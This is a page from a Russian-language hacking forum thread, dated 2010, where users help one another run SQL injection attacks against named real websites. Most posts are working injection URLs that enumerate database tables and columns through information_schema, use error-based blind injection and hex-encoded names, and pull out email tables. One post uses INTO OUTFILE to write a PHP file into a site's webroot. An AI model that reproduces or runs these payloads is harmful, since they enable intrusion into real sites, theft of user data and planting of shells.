ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1175 из 1393 « Первая < 175675107511251165 1171 1172 1173 1174 1175 1176 1177 1178 1179 118512251275 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11741  
Старый 28.02.2010, 02:30
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию
Цитата:
Сообщение от Darren  
Доступа в коломс нет, но запрос выполняется -
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+column_name+from+nformation_Schema .columns%20--
Я знаю что существует таблица email со строкой id и mail но при выполнении такого запроса
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+mail+from+email%20--
Выводит обычное окно как без запроса, как это можно обойти?
Слепая

_http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

Код:
Duplicate column name '5.0.77'
 
Ответить с цитированием

  #11742  
Старый 28.02.2010, 02:50
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
Цитата:
Сообщение от Darren  
Доступа в коломс нет, но запрос выполняется -
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+column_name+from+nformation_Schema .columns%20--
i добавь к имени базы и появится)
Цитата:
Сообщение от .:[melkiy]:.  
Слепая

_http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

Код:
Duplicate column name '5.0.77'
проще наверно так)
Цитата:
http://www.parperfecto.com/able/events_view.php?eid=3+into+outfile+'/var/www/vhosts/parperfecto.com/httpdocs/yaneshell.php'+fields+enclosed+by+'<?phpinfo();?>'
http://www.parperfecto.com/yaneshell.php
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #11743  
Старый 28.02.2010, 07:28
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
вот например здесь..
http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+AS CII(LOWER(TABLE_NAME))=117+--+

здесь запрос зделано так чтоби показано таблици ц начунаюших с букви у..

а как вот здесь WHERE+ASCII(LOWER(TABLE_NAME))=117 напистаь полное имя таблици ??
 
Ответить с цитированием

  #11744  
Старый 28.02.2010, 07:43
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от LokbatanLi  
вот например здесь..
http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+AS CII(LOWER(TABLE_NAME))=117+--+

здесь запрос зделано так чтоби показано таблици ц начунаюших с букви у..

а как вот здесь WHERE+ASCII(LOWER(TABLE_NAME))=117 напистаь полное имя таблици ??

http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+ta ble_name='your_table'--
 
Ответить с цитированием

  #11745  
Старый 28.02.2010, 07:47
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от попугай  
http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+ta ble_name='your_table'--
Помоему смысла в этом запросе никакого нету, ибо получаем имя таблицы где имя таблицы равно имени таблицы)
Ну и вопрос тоже какой то непонятный.
Получать таблицы с именем начинающемся с U лучше так:
Код:
http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5,%206,7,8,9,10+FROM+information_schema.tables+where+table_name>0x55+--+
Последний раз редактировалось Seravin; 28.02.2010 в 08:26..
 
Ответить с цитированием

  #11746  
Старый 28.02.2010, 07:59
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
а вот именно where+table_name>x55+--+ здесь как написать >полнуй имя таблици ??
 
Ответить с цитированием

  #11747  
Старый 28.02.2010, 08:13
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от Ershik  
Если прикручен модуль mod_include
попробуй загрузить shell.txt с данными:
Ога, PHP невыполняеться, а ASP.NET на Apache сервере с расширением .txt выполниться..
 
Ответить с цитированием

  #11748  
Старый 28.02.2010, 08:17
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от LokbatanLi  
а вот именно where+table_name>x55+--+ здесь как написать >полнуй имя таблици ??
Всё, догнал, что ты хотел. Да, полное имя таблицы в hex
 
Ответить с цитированием

  #11749  
Старый 28.02.2010, 08:21
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
ne polucaetsya..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75+--+

i ne tak..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+
 
Ответить с цитированием

  #11750  
Старый 28.02.2010, 08:25
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от LokbatanLi  
ne polucaetsya..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75+--+

i ne tak..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+
0x75736572
 
Ответить с цитированием
Ответ
Страница 1175 из 1393 « Первая < 175675107511251165 1171 1172 1173 1174 1175 1176 1177 1178 1179 118512251275 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ